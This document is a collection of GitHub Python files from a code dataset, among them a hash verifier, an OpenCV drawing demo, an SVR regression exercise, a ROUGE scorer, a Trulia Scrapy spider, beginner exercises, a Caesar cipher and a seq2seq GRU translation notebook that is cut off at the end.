while(True):\n cur_index,block=pseudoReceive.receiveNextBlock()\n if block is None:\n print(\"Verified status: OK\")\n return True\n if hash_val==SHA256.new(block).digest():\n print(\"Verify block number\",cur_index,\": OK\\n\")\n hash_val=block[-32:]\n else:\n print(\"verified status: ERROR\")\n return False\n\ndef main():\n filename=sys.argv[1]\n recv=PseudoReceive(filename)\n pseudoVerify(recv)\n print(\"HASH VALUE h0 is:\\n\",fileHash(filename)[0].hex())\n\nif __name__=='__main__':\n main()\n\n\n\n\n\n\n \n\n\n\n ","repo_name":"dangnh0611/cryptography1_coursera","sub_path":"Q3_video_hash/video_hash.py","file_name":"video_hash.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"70794720802","text":"import numpy as np\nimport cv2\nimport math\n\n# Global variables\ncanvas = np.ones([500,500,3],'uint8')*255\n\ncolorRed = (255, 0, 0)\ncolorYellow = (255, 255, 0)\ncolorBlue = (0, 0, 255)\n\ncolorToPaint = colorRed\n# click callback\n\npointStart = (0, 0)\npointEnd = (0, 0)\nradius = 10\n\nline_width = 3\ndrawing = False\ndistance = 0\n\n\ndef click(event, x, y, flags, param):\n\n\tglobal canvas, pointStart, pointEnd, radius, drawing, distance\n\n\n\tif event == cv2.EVENT_LBUTTONDOWN:\n\t\tdrawing = True\n\t\tpointStart = (x, y)\n\t\t# cv2.circle(canvas, pointStart, radius, colorToPaint, line_width)\n\n\telif event == cv2.EVENT_MOUSEMOVE:\n\t\tif drawing == True:\n\t\t\tpointEnd = (x, y)\n\n\t\t\tdiff = (pointStart[0] - pointEnd[0]), (pointStart[1] - pointEnd[1])\n\n\t\t\tdistance = math.sqrt(math.pow((pointEnd[0] - pointStart[0]),2) + math.pow((pointEnd[1] - pointStart[1]),2))\n\n\t\t\tradius = int(distance)\n\n\t\t\tcanvas = np.ones([500, 500, 3], 'uint8') * 255\n\n\t\t\tcv2.circle(canvas, pointStart, radius, colorToPaint, line_width)\n\n\n\telif event == cv2.EVENT_LBUTTONUP:\n\t\tdrawing = False\n\t\tprint(distance)\n\n# window initialization and callback assignment\ncv2.namedWindow(\"canvas\")\ncv2.setMouseCallback(\"canvas\", click)\n\n# Forever draw loop\n\nwhile True:\n\n\tcv2.imshow(\"canvas\",canvas)\n\n\t# key capture every 1ms\n\tch = cv2.waitKey(1)\n\tif ch & 0xFF == ord('q'):\n\t\tbreak\n\telif ch & 0xFF == ord('r'):\n\t\tcolorToPaint = colorRed\n\telif ch & 0xFF == ord('b'):\n\t\tcolorToPaint = colorBlue\n\telif ch & 0xFF == ord('y'):\n\t\tcolorToPaint = colorYellow\n\n\ncv2.destroyAllWindows()\n\n\n\n\n","repo_name":"jarzab3/openCV","sub_path":"Ex_Files_OpenCV_Python_Dev/Ch02/02_10 Begin/02_10.py","file_name":"02_10.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8166658412","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\nfrom pandas import Series\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.svm import SVR\nfrom sklearn.metrics import mean_squared_error\n\nauto_data = pd.read_csv('../data/auto-mpg.data', delim_whitespace=True, header=None,\n names=['mpg','cylinders', 'displacement', 'horsepower', 'weight','acceleration', 'model',\n 'origin', 'car_name'])\nprint(auto_data.head())\n\n# the car name will now effect our training\nprint(len(auto_data['car_name'].unique()))\nprint(len(auto_data))\n\nauto_data = auto_data.drop('car_name', axis=1)\nprint(auto_data.head())\n\n# convert origin to one-hot presentation\nprint(auto_data['origin'].unique())\norigin_dict = {1: 'america', 2: 'europe', 3: 
'asia'}\nauto_data['origin'] = auto_data['origin'].replace(origin_dict)\nauto_data = pd.get_dummies(auto_data, columns=['origin'])\nprint(auto_data.sample(5))\n\n# handling missing values\nauto_data = auto_data.replace('?', np.nan)\nauto_data = auto_data.dropna()\n\n# training our model\nX = auto_data.drop('mpg', axis=1)\nY = auto_data['mpg']\n\nX_train, x_test, Y_train, y_test = train_test_split(X, Y, test_size=0.2, random_state=0)\n\n# start with C=1.0 to 0.5 (better model)\nregression_model = SVR(kernel='linear', C=0.5)\nregression_model.fit(X_train, Y_train)\n\nprint(regression_model.score(X_train, Y_train))\n\npredictors = X_train.columns\ncoef = Series(regression_model.coef_[0], predictors).sort_values()\n# coef.plot(kind='bar', title='Modal Coefficients')\n# plt.show()\n\ny_predict = regression_model.predict(x_test)\n\n# plt.figure(figsize=(15, 6))\n# plt.plot(y_predict, label='Predicted')\n# plt.plot(y_test.values, label='Actual')\n# plt.ylabel('MGP')\n# plt.legend()\n# plt.show()\n\nprint(regression_model.score(x_test, y_test))\n\nregression_model_mse = mean_squared_error(y_predict, y_test)\nprint(regression_model_mse)\nprint(math.sqrt(regression_model_mse))\n","repo_name":"sharon12312/machine-learning-courses-pluralsight","sub_path":"machine-learning-models/exercises/models/regression/SVR.py","file_name":"SVR.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37036518507","text":"from __future__ import unicode_literals, print_function, division\nimport json\n\nimport Models.utils as utils\nfrom Models.utils import *\nfrom Models.pointer_gen import *\nfrom Data.data_loader import *\nimport torch\n\nfrom tensorboardX import SummaryWriter\nfrom sumeval.metrics.rouge import RougeCalculator\nfrom pythonrouge.pythonrouge import Pythonrouge\n\nclass Scorer():\n def __init__(self, model):\n self.model = model\n self.sample_predictions = dict()\n self.test_samples = None\n self.beam_batch_size = 6\n self.rewards_to_score = {}\n\n\n\n def score_model(self, val_batches, use_cuda, beam, verbose=False, rouge_dist=True):\n\n results = []\n\n for b in range(len(val_batches)):\n preds = self.model.predict_v2(val_batches[b], 120, beam, use_cuda)\n for p in range(len(val_batches[b])):\n pair = val_batches[b][p]\n ref = pair.get_text(pair.full_target_tokens, self.model.vocab).replace(\" EOS\", \"\")\n if not beam:\n seq = [t[p] for t in preds]\n results.append({'ref': ref, 'seq': \" \".join([s['word'] for s in seq]).split(\" EOS\")[0]})\n results[-1]['p_gen'] = sum([s['p_gen'] for s in seq[:len(results[-1]['seq'])]]) / len(results[-1]['seq'])\n results[-1]['novelty'] = pair.compute_novelty([s['token_idx'] for s in seq[:len(results[-1]['seq'])]])\n else:\n results.append({'ref': ref, 'seq': preds[p][0][0].split(\" EOS\")[0]})\n results[-1]['p_gen'] = preds[p][0][2]\n results[-1]['novelty'] = pair.compute_novelty(\n pair.get_tokens(results[-1]['seq'].split(\" \"), self.model.vocab))\n\n results[-1]['novelty_v2'] = pair.compute_novelty_v2(\n [pair.get_tokens(text.split(\" \")+[\".\"], self.model.vocab)\n for text in results[-1]['seq'].split(\" . 
\")], self.model.vocab)\n\n results[-1]['ref_novelty'] = sum([sum(vec) / len(vec) for vec in pair.tri_gram_novelty_vector]) / \\\n len(pair.tri_gram_novelty_vector)\n\n for r in self.rewards_to_score:\n results[-1][r] = self.rewards_to_score[r].compute_reward([pair], [results[-1]['seq'].split(\" \")],\n self.model)[0]\n\n if b % 10 == 0 and verbose: print(b, \": \", len(val_batches))\n\n rouge_calc = RougeCalculator(stopwords=False, lang=\"en\")\n scores = {\"Rouge_1\": 0, \"Rouge_2\": 0, \"Rouge_L\": 0, \"Tri_novelty\": 0, \"p_gens\": 0, \"Tri_novelty_v2\": 0}\n scores['rouge_dist'] = {}\n for rouge in ['ROUGE-1-F', 'ROUGE-2-F', 'ROUGE-3-F', 'ROUGE-L-F']:\n scores['rouge_dist'][rouge] = []\n for k in range(21): scores['rouge_dist'][rouge].append([])\n\n for r in self.rewards_to_score: scores[r] = 0\n\n if verbose: print(\"Computing SumEval scores\")\n summaries, references = [], []\n\n for result in results:\n summaries.append(result['seq'])\n references.append(result['ref'])\n scores[\"Rouge_1\"] += (rouge_calc.rouge_1(result['seq'], result['ref']) *100)\n scores[\"Rouge_2\"] += (rouge_calc.rouge_2(result['seq'], result['ref']) *100)\n scores[\"Rouge_L\"] += (rouge_calc.rouge_l(result['seq'], result['ref']) *100)\n scores[\"Tri_novelty\"] += result['novelty']\n scores[\"Tri_novelty_v2\"] += result['novelty_v2']\n if 'p_gen' in result: scores[\"p_gens\"] += result['p_gen']\n for r in self.rewards_to_score: scores[r] += result[r]\n\n if rouge_dist:\n perl_scores = self.score_rouge_org([result['seq']], [result['ref']])\n for rouge in scores['rouge_dist']:\n scores['rouge_dist'][rouge][int(20*result['ref_novelty'])].append(perl_scores[rouge])\n\n for k in scores:\n if k is 'rouge_dist':\n for rouge in scores['rouge_dist']:\n scores['rouge_dist'][rouge] = [(sum(l)/len(l), len(l)) if len(l) > 0 else (0, 0) for l in scores['rouge_dist'][rouge]]\n\n else:\n scores[k] = scores[k] / len(results)\n\n if verbose: print(\"Computing Perl scores\")\n\n perl_scores = self.score_rouge_org(summaries, references)\n for k in perl_scores:\n if k[-1] != \"R\":\n id = \"R\" + k.replace(\"-\", \"_\").lower()[1:-1] + \"perl\"\n scores[id] = 100*perl_scores[k]\n\n return scores\n\n\n def score_rouge_org(self, sammaries, references):\n\n rouge = Pythonrouge(summary_file_exist=False,\n summary=[s.replace(\" . \", \" .\\n\").split(\"\\n\") for s in sammaries],\n reference=[[s.replace(\" . 
\", \" .\\n\").split(\"\\n\")] for s in references],\n n_gram=3, ROUGE_SU4=False, ROUGE_L=True,\n recall_only=False, stemming=True, stopwords=False,\n word_level=True, length_limit=False, length=150,\n use_cf=False, cf=95, scoring_formula='average',\n resampling=False, samples=1000, favor=True, p=0.5)\n return rouge.calc_score()","repo_name":"eivhav/Abstractive_Summarization","sub_path":"Evaluation/scorer.py","file_name":"scorer.py","file_ext":"py","file_size_in_byte":5340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18263578858","text":"from typing import Tuple\n\nRELATIVE_DIRECTIONS = {\n 'U': (0, 1),\n 'D': (0, -1),\n 'L': (-1, 0),\n 'R': (1, 0),\n}\n\nGEOGRAPHICAL_DIRECTIONS = {\n 'N': (0, 1),\n 'S': (0, -1),\n 'W': (-1, 0),\n 'E': (1, 0),\n}\n\n\ndef get_direction(ch: str) -> Tuple[int, int]:\n \"\"\"Coordinates point for direction\n\n Args:\n ch: str - direction as a single letter UDLR or NEWS\n\n Returns:\n tuple (x, y) - direction coordinates.\n E.g.:\n N -> (0, 1) # north\n S -> (0, -1) # south\n L -> (-1, 0) # left\n\n Raises KeyError:\n if direction char not in allowed directions.\n \"\"\"\n try:\n return (\n RELATIVE_DIRECTIONS.get(ch, None) or\n GEOGRAPHICAL_DIRECTIONS[ch]\n )\n except KeyError:\n raise KeyError(\n f'No such direction {ch}. Available directions: NSWE and UDLR'\n )\n\n\ndef get_target_point(start: Tuple[int, int], steps: str) -> Tuple[int, int]:\n \"\"\"Coordinates of target point based on start point and steps.\n\n Args:\n start: tuple (x, y) - coordinates of the starting point.\n steps: string e.g U15 - contains direction (U D L R or N E S W)\n and number of steps.\n\n Directions - two direction systems are possible:\n Relative orientations:\n U - Up -> (0, 1)\n D - Down -> (0, -1)\n L - Left -> (-1, 0)\n R - Right -> (1, 0)\n\n Geographical directions:\n N - North -> (0, 1)\n E - East -> (1, 0)\n S - South -> (0, -1)\n W - West -> (-1, 0)\n\n Returns:\n tuple (x, y) - coordinates of the target point.\n \"\"\"\n x, y = start\n ch, n = steps[0], int(steps[1:])\n dx, dy = get_direction(ch)\n return x + n * dx, y + n * dy\n\n\ndef path_points(start, steps):\n \"\"\"Generate coordinates of each path point based on start point and steps.\n\n Args:\n start: tuple (x, y) - coordinates of the starting point.\n steps: string e.g U15 - contains direction (UDLR or NESW)\n and number of steps.\n\n Directions - two direction systems are possible:\n Relative orientations:\n U - Up -> (0, 1)\n D - Down -> (0, -1)\n L - Left -> (-1, 0)\n R - Right -> (1, 0)\n\n Geographical directions:\n N - North -> (0, 1)\n E - East -> (1, 0)\n S - South -> (0, -1)\n W - West -> (-1, 0)\n\n Yields:\n tuple (x, y) - point.\n \"\"\"\n x, y = start\n ch, n = steps[0], int(steps[1:])\n dx, dy = get_direction(ch)\n tx, ty = x + n * dx, y + n * dy\n\n while not (x == tx and y == ty):\n x += dx\n y += dy\n yield x, y\n","repo_name":"lenarother/santa-helpers","sub_path":"santa_helpers/paths.py","file_name":"paths.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26777003772","text":"#!/usr/bin/env python\n\n\"\"\"The setup script.\"\"\"\nimport time\nfrom setuptools import setup, find_packages\n# from stopwords-zh import __version__\n\nversion = time.strftime(\"%Y.%m.%d.%H.%M.%S\", time.localtime())\n\nwith open('README.md') as readme_file:\n readme = readme_file.read()\n\nwith open('HISTORY.rst') as history_file:\n history = 
history_file.read()\n\nwith open('requirements.txt', encoding='utf-8') as f:\n    requirements = f.read().split('\n')\n\nsetup(\n    author=\"stopwords-zh\",\n    author_email='yuanjie@example.com',\n    python_requires='>=3.6',\n    classifiers=[\n        'Development Status :: 2 - Pre-Alpha',\n        'Intended Audience :: Developers',\n        'License :: OSI Approved :: MIT License',\n        'Natural Language :: English',\n        'Programming Language :: Python :: 3',\n        'Programming Language :: Python :: 3.6',\n        'Programming Language :: Python :: 3.7',\n        'Programming Language :: Python :: 3.8',\n    ],\n    description=\"stopwords-zh\",\n    entry_points={\n        'console_scripts': [\n            'stopwords=stopwords.clis.cli:cli'\n        ],\n    },\n    install_requires=requirements,\n    license=\"MIT license\",\n    long_description=readme + '\\n\\n' + history,\n    long_description_content_type=\"text/markdown\",\n    include_package_data=True,\n    keywords='stopwords-zh',\n    name='stopwords-zh',\n    packages=find_packages(include=['stopwords', 'stopwords.*']),\n\n    test_suite='tests',\n    url='https://github.com/yuanjie-ai/stopwords-zh',\n    version=version, # '0.0.0',\n    zip_safe=False,\n)\n\n","repo_name":"yuanjie-ai/stopwords-zh","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"54"}
{"seq_id":"15451275251","text":"print('*** Calculator ***')\nfirst_num = float(input('Enter the first number: '))\nsecond_num = float(input('Enter the second number: '))\noperators = input('What should be done with them?: ')\nif operators == '+':\n    print(first_num + second_num)\nelif operators == '-':\n    print(first_num - second_num)\nelif operators == '/':\n    if second_num == 0:\n        print('Division by 0 is not allowed!')\n    else:\n        print(first_num/second_num)\nelif operators == '*':\n    print(first_num*second_num)\nelif operators == '**':\n    print(first_num**second_num)\nelse:\n    print('Unknown operator')\n\nprint('\\n*** Squares of natural numbers ***')\nnumber = int(input('Enter a number: '))\nfor i in range(1, number):\n    if i**2 < number:\n        print(i**2, end=' ')\n\n\nnumber = int(input('Enter your number: '))\nfor i in range(2, number // 2 + 1):\n    if number % i == 0:\n        print('Composite number')\n        break\nelse:\n    print('Prime number')\n\n\nprint('\\n*** The mushroom task ***')\nmushroom = int(input('Number of mushrooms: '))\nlast_num = int(mushroom) % 10\nexception = int(mushroom) % 100\n# Ukrainian declension endings for \"гриб\" (mushroom): no suffix for 1, 'а' for 2-4, 'ів' otherwise\nvariable_pass = ('')\nvariable_range = ('а')\nvariable_else = ('ів')\nif last_num < 10 and exception == 11 or exception in range(12,15):\n    print((f'Masha found {mushroom} гриб{variable_else} in the forest'))\nelif last_num == 1:\n    print(f'Masha found {mushroom} гриб{variable_pass} in the forest')\nelif last_num in range(2, 5):\n    print(f'Masha found {mushroom} гриб{variable_range} in the forest')\nelse:\n    print((f'Masha found {mushroom} гриб{variable_else} in the forest'))\n","repo_name":"arulik/Lesson1","sub_path":"lesson3.py","file_name":"lesson3.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"74569876642","text":"alphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n\ndef caesar(message, shift, shift_direction):\n    if shift_direction == \"decode\":\n        shift *= -1\n    result = \"\"\n    for char in message:\n        shifted_char_index = (alphabet.index(char) + shift) % 26\n        result += alphabet[shifted_char_index]\n    return result\n\nsession_active = True\n\nwhile 
session_active:\n command = input(\"Type 'encode' to encrypt, type 'decode' to decrypt: \")\n message = input(\"Type your message: \")\n message = list(message.replace(\" \",\"\").lower())\n shift_number = int(input(\"Type your shift number: \"))\n shifted_message = caesar(message, shift_number, command)\n print(f\"Your {command}d message is: {shifted_message}\\n\")\n keep_going = input(\"Would you like to have another go? Type 'yes' or 'no': \")\n print()\n session_active = bool(keep_going == \"yes\")\n\n","repo_name":"kalikokalikova/100_days_of_python","sub_path":"day_8.py","file_name":"day_8.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12201053163","text":"\n####################################################################################################\n\nfrom scrapy import Spider, Request\nfrom nyz.items import nyzItem\nimport re\n\n####################################################################################################\n\nclass nyzliteSpider(Spider):\n\tname \t\t\t= \"nyz_lite_spider\"\n\tallowed_urls \t= ['https://www.trulia.com/']\n\tstart_urls \t\t= [\n\t'https://www.trulia.com/sold/New_York,NY/', \n\t'https://www.trulia.com/sold/Brooklyn,NY/', \n\t'https://www.trulia.com/sold/Bronx,NY/',\n\t'https://www.trulia.com/sold/36081_c/',\n\t'https://www.trulia.com/sold/Staten_Island,NY/']\n\n####################################################################################################\n\t\n\tdef parse(self, response):\n\t\tprint(response)\n\t\t# Determining number of result pages that distribute the total number of listings:\n\t\tof_total_listings \t\t\t= response.xpath(\"//div[@class = 'txtC h6 typeWeightNormal typeLowlight']/text()\").extract_first()\n\t\ta, results_per_page, total \t= map(lambda x: int(x), re.findall('\\d+', of_total_listings))\n\t\tnumber_result_pages \t\t= (total // results_per_page) + 1\n\t\t# list comprehension to generate each result page's url iterated over the number of result pages:\n\t\tresult_urls \t\t\t\t= [ str(response)[5:-1] + '{}_p/'.format(x) for x in range(1, number_result_pages+1)] #[0:1]# TEST RUN\n\t\tprint(result_urls[:2])\n\t\t# Request to yield each results page for next level parsing:\n\t\tfor url in result_urls:\n\t\t\tyield Request(url=url, callback=self.parse_result_page_listing)\n\n####################################################################################################\n\n\t# def parse_result_page(self, response):\n\t# \t# List of urls to individual page for each separate listing.\n\t# \t# Step = 3 slicing, since there are 3 identical href attributes in 3 <a> tags:\n\t# \tindv_listing_page_url \t= response.xpath(\"//div[@class = 'card boxBasic backgroundBasic']//a/@href\").extract()[::3]\n\t# \t# Request to yield each individual listing page for next level parsing:\n\t# \tfor url in indv_listing_page_url:\n\t# \t\tyield Request(url= 'https://www.trulia.com'+url, callback=self.parse_listing_page)\n\n####################################################################################################\n\n\tdef parse_result_page_listing(self, response):\n\t\t# extracting features(variables) of the listing using unique x.paths (and indexing & subscripting):\n\t\tpage_listings = response.xpath('//li[@class=\"xsCol12Landscape smlCol12 lrgCol8\"]')\n\t\tfor listing in page_listings:\n\t\t\tsoldPrice\t\t= listing.xpath(\".//span[@class='cardPrice h5 man pan typeEmphasize noWrap 
typeTruncate']/text()\").extract()\n\t\t\tsoldDate \t\t= listing.xpath(\".//div[@class = 'cardFooter soldFooter typeWeightNormal typeLowlight cardFooter man ptn phm']/a/text()\").extract()[1::2]\n\t\t\t\n\t\t\tsqft_list\t\t= listing.xpath(\".//ul[@data-testid='cardDescription']//li\").extract()\t\t#list of <li> tags\n\t\t\tsqft_values\t\t= listing.xpath(\".//ul[@data-testid='cardDescription']//text()\").extract() \t# cannot take NA for missing values\n\t\t\tsqft \t\t\t= [0] * len(sqft_list)\n\t\t\tj=0\t\n\t\t\tfor i in range(len(sqft_list)):\n\t\t\t\ttemp \t\t= sqft_values[j]\n\t\t\t\tif 'class=\"iconBed typeReversed\"' in sqft_list[i]:\n\t\t\t\t\tsqft[i]\t= \"\"\n\t\t\t\telse:\n\t\t\t\t\tsqft[i] = temp\n\t\t\t\t\tj \t\t+= 1\n\t\t\taddress\t\t\t= listing.xpath(\".//span[@itemprop='streetAddress']/text()\").extract()\n\t\t\tcity\t\t\t= listing.xpath(\".//span[@itemprop='addressLocality']/text()\").extract()[1::3]\n\t\t\tzipCode\t\t\t= listing.xpath(\".//span[@itemprop='postalCode']/text()\").extract()\n\t\t\t\n\t\t\t# Appending spider object(acts like dictionary) with features per listing (populating columns for each row/listing):\n\t\t\tlisting \t\t\t\t\t= nyzItem()\n\t\t\tlisting['soldPrice'] \t\t= soldPrice\n\t\t\tlisting['soldDate'] \t\t= soldDate\n\t\t\tlisting['sqft'] \t\t\t= sqft\n\t\t\tlisting['address'] \t\t\t= address\n\t\t\tlisting['city'] \t\t\t= city\n\t\t\tlisting['zipCode'] \t\t\t= zipCode\n\t\t\t\n\t\t\tyield listing\n\n####################################################################################################\n# <li class=\"iconBed typeReversed\"></li>\n# <span itemprop=\"addressLocality\" data-reactid=\"264\">\n####################################################################################################","repo_name":"CodeSigma91/Project_WebScraping","sub_path":"nyz/spiders/nyz_lite_spider.py","file_name":"nyz_lite_spider.py","file_ext":"py","file_size_in_byte":4182,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"}
{"seq_id":"32204541451","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom DataPreparation_python import * \n\nimport torch\nimport torch.nn as nn\nfrom torch import optim\nimport torch.nn.functional as F\nfrom IPython.display import Image\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nprint(\"Your device : \" + str(device))\n\n# Extract pairs from the Dataset prepared earlier\n\n\n# I ran this project on an NVIDIA RTX 3060 Ti, so I should mention that CUDA (the GPU rather than the CPU) is used. <br />\n# Accordingly, the train function below is also written on the assumption that CUDA is used during training. <br />\n\n# <h3>Building the Encoder & Decoder</h3>\n\n# In[2]:\n\n\nclass EncoderRNN(nn.Module):\n    def __init__(self, input_size, hidden_size):\n        super(EncoderRNN, self).__init__()\n        self.hidden_size = hidden_size\n        \n        self.embedding = nn.Embedding(input_size, hidden_size)\n        self.gru = nn.GRU(hidden_size, hidden_size)\n        \n    def forward(self, input, hidden):\n        embedded = self.embedding(input).view(1, 1, -1)\n        output = embedded\n        output, hidden = self.gru(output, hidden)\n        return output, hidden\n    \n    def initHidden(self):\n        return torch.zeros(1, 1, self.hidden_size, device=device)\n\n\n# The Encoder itself is structured very much like a vanilla RNN; a detailed explanation of RNNs is omitted here. <br />\n# A GRU cell is used instead of a plain RNN cell for better performance. 
hidden state의 초기값은 torch.zeros를 이용하여 0으로 주었다.\n\n# In[3]:\n\n\nImage(\"img/encoder.png\")\n\n\n# In[4]:\n\n\nclass DecoderRNN(nn.Module):\n def __init__(self, hidden_size, output_size):\n super(DecoderRNN, self).__init__()\n self.hidden_size = hidden_size\n \n self.embedding = nn.Embedding(output_size, hidden_size)\n self.gru = nn.GRU(hidden_size, hidden_size)\n self.out = nn.Linear(hidden_size, output_size)\n self.softmax = nn.LogSoftmax(dim=1)\n \n def forward(self, input, hidden):\n output = self.embedding(input).view(1, 1, -1)\n # what does .view(1, 1, -1) mean?\n output = F.relu(output)\n output, hidden = self.gru(output, hidden)\n output = self.softmax(self.out(output[0]))\n return output, hidden\n \n def initHidden(self):\n return torch.zeros(1, 1, self.hidden_size, device=device)\n\n\n# Decoder 또한 GRU 셀을 이용하였고, 활성화 함수는 ReLU를 이용했다. <br />\n# 이후에, 최종 ouput은 Softmax 함수를 이용하여, 다음에 올 확률이 가장 높은 단어를 선택할 수 있도록 한다. <br />\n# Encoder와 Decoder 둘 다 첨부한 사진을 토대로 코드와 비교하면서 보면 이해를 도울 수 있다. \n\n# In[5]:\n\n\nImage(\"img/decoder.png\")\n\n\n# <h3>Training</h3>\n\n# In[6]:\n\n\ndef indexesFromSentence(lang, sentence):\n return [lang.word2index[word] for word in sentence.split(' ')]\n\ndef tensorFromSentence(lang, sentence):\n indexes = indexesFromSentence(lang, sentence)\n indexes.append(EOS_token)\n return torch.tensor(indexes, dtype=torch.long, device=device).view(-1, 1)\n\ndef tensorsFromPair(pair):\n input_tensor = tensorFromSentence(input_lang, pair[0])\n target_tensor = tensorFromSentence(output_lang, pair[1])\n return (input_tensor, target_tensor)\n\n\n# 실제 training을 거치기 이전에 앞서 준비한 데이터를 tensor로 바꿔주는 과정을 거쳐야한다. <br />\n# 문장으로부터 index를 받아오는 indexesFromSentence함수, 문장을 tensor로 변환하는 tensorFromSentece 함수, <br />\n# 한 개의 영어 문장과 한 개의 프랑스어 문장으로 이루어진 Pair를 input_tensor와 target_tensor로 return 해주는 <br />\n# tensorsFromPair 함수를 제작한다. 
\n\n# In[7]:\n\n\nteacher_forcing_ratio = 1\n\ndef train(input_tensor, target_tensor, encoder, decoder, encoder_optimizer, decoder_optimizer, criterion,\n          max_length=MAX_LENGTH):\n    encoder_hidden = encoder.initHidden()\n    \n    encoder_optimizer.zero_grad()\n    decoder_optimizer.zero_grad()\n    input_length = input_tensor.size(0)\n    target_length = target_tensor.size(0)\n    \n    encoder_outputs = torch.zeros(max_length, encoder.hidden_size, device=device)\n    loss = 0\n    \n    for ei in range(input_length):\n        encoder_output, encoder_hidden = encoder(input_tensor[ei], encoder_hidden)\n        encoder_outputs[ei] = encoder_output[0, 0]\n    \n    decoder_input = torch.tensor([[SOS_token]], device=device)\n    decoder_hidden = encoder_hidden \n    \n    use_teacher_forcing = True if random.random() < teacher_forcing_ratio else False\n    if use_teacher_forcing:\n        # Teacher forcing: Feed the target as the next input\n        for di in range(target_length):\n            decoder_output, decoder_hidden= decoder(decoder_input, decoder_hidden)\n            loss += criterion(decoder_output, target_tensor[di])\n            decoder_input = target_tensor[di] # Teacher forcing\n\n    else:\n        # Without teacher forcing: use its own predictions as the next input\n        for di in range(target_length):\n            decoder_output, decoder_hidden = decoder(decoder_input, decoder_hidden)\n            topv, topi = decoder_output.topk(1)\n            decoder_input = topi.squeeze().detach() # detach from history as input\n\n            loss += criterion(decoder_output, target_tensor[di])\n            if decoder_input.item() == EOS_token:\n                break\n    \n    loss.backward()\n    \n    encoder_optimizer.step()\n    decoder_optimizer.step()\n    \n    return loss.item() / target_length\n    \n\n\n# 'Teacher Forcing' 혹은 '교사 강요'는 input과 Decoder가 예측한 단어가 아닌 실제 정답인 target을 이용해서 학습을 시키는 것을 말한다. <br/> 'Teacher Forcing'을 이용하지 않을 때에는 Decoder가 예측하는 단어를 target으로 설정하여, 학습을 진행시키는 것이다. <br />\n# '학습'은 적절한 input과 target을 이용하여, 다음에 input을 모델에 주었을 때, 적절한 target을 예측할 수 있게 하는 것이다. <br />\n# 하지만, 교사 강요를 거치지 않고, Decoder가 예측한 단어들을 아직 '정답'이라고 볼 수는 없다. <br />\n# <br/>\n# 이 코드에서는 teacher_forcing_ratio이라는 변수에 0~1 값을 선언하여, 'Teacher Forcing'을 거치는 비율 또한 설정할 수 있다. <br />\n# if use_teacher_forcing: 에서는 위에서 설명한대로 loss값을 output과 target_tensor로 구하는 것을 볼 수 있다. <br />\n# else: 에서는 교사 강요를 사용하지 않고 Decoder가 예측한 값을 이용하고자 한다. DecoderRNN 클래스를 보면, Decoder는 output과 hidden state를 매번 return한다. <br />\n# .topk()은 가장 큰 element를 반환해주는 함수이다. <br />\n# <br />\n# torch.topk documentation: https://pytorch.org/docs/stable/generated/torch.topk.html torch.topk는 return 값으로 가장 큰 element의 value와 그 index를 return한다. <br />\n# 즉, decoder_output.topk(1)에서 가장 큰 value를 가진 element 한 개를 내보내는데, <br />\n# 그 element의 value는 topv, 그 index는 topi에 저장한다. 
위 과정을 console 창에서 밑과 같이 확인할 수 있다.\n\n# In[8]:\n\n\nImage(\"img/topi.png\")\n\n\n# In[9]:\n\n\nimport time\nimport math\n\ndef asMinutes(s):\n m = math.floor(s / 60)\n s -= m * 60\n return '%dm %ds' % (m, s)\n\n\ndef timeSince(since, percent):\n now = time.time()\n s = now - since\n es = s / (percent)\n rs = es - s\n return '%s (- %s)' % (asMinutes(s), asMinutes(rs))\n\n\n# In[34]:\n\n\nplot_losses = []\ndef trainIters(encoder, decoder, n_iters, print_every=1000, plot_every=100, learning_rate=0.01):\n start = time.time()\n \n print_loss_total = 0\n plot_loss_total = 0\n \n encoder_optimizer = optim.SGD(encoder.parameters(), lr=learning_rate)\n decoder_optimizer = optim.SGD(decoder.parameters(), lr=learning_rate)\n training_pairs = [tensorsFromPair(random.choice(pairs)) for i in range(n_iters)]\n criterion = nn.NLLLoss()\n \n for iter in range(1, n_iters+1): \n training_pair = training_pairs[iter-1]\n input_tensor = training_pair[0]\n target_tensor = training_pair[1]\n \n loss = train(input_tensor, target_tensor, encoder, decoder, encoder_optimizer, decoder_optimizer, criterion)\n print_loss_total += loss\n plot_loss_total += loss\n \n if iter % print_every == 0:\n print_loss_avg = print_loss_total / print_every\n print_loss_total = 0\n print('%s (%d %d%%) loss: %.4f' % (timeSince(start, iter / n_iters), iter, (iter / n_iters * 100), print_loss_avg))\n\n if iter % plot_every == 0:\n plot_loss_avg = plot_loss_total / plot_every\n plot_losses.append(plot_loss_avg)\n plot_loss_total = 0\n\n\n# optimizer로는 SGD를 사용하였고, loss Function으로는 NLLLoss를 사용했다. <br />\n# 학습 중에 진행 과정을 시각화 해주기 위하여, asMinute 함수와 timeSince 함수를 만든다.\n\n# In[35]:\n\n\nhidden_size = 256\nencoder1 = EncoderRNN(input_lang.n_words, hidden_size).to(device)\ndecoder1 = 